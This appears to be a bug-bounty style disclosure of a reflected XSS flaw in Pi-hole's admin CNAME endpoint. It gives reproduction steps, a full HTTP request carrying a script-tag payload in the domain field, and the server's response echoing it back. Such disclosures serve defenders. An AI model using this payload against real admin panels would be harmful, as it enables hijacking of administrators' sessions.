✍️ Description

Reflected XSS in POST /admin/scripts/pi-hole/php/customcname.php

🕵️‍♂️ Proof of Concept

1. Login as admin, Go to Local DNS -> CNAME Records -> Add a new CNAME record
2. Input <script>alert(1)</script> in domain field and anything in target domain.
3. The Payload in post body domain is URL encoded, use a proxy like burp to manually replace with the decoded value.

POST /admin/scripts/pi-hole/php/customcname.php HTTP/2
Host: pihole.example.com
Cookie: persistentlogin=***; persistentlogin=***; PHPSESSID=***
Content-Length: 109
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://pihole.example.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pihole.example.com/admin/cname_records.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

action=add&domain=<script>alert(1)</script>&target=a&token=***

HTTP/2 200 OK
Server: nginx/1.21.1
Date: Wed, 01 Sep 2021 10:36:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 78
Access-Control-Allow-Origin: https://pihole.example.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Pi-Hole: The Pi-hole Web interface is working!
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000

{"success":false,"message":"Domain '<script>alert(1)<\/script>' is not valid"}

💥 Impact

Reflected XSS on POST parameter “domain”.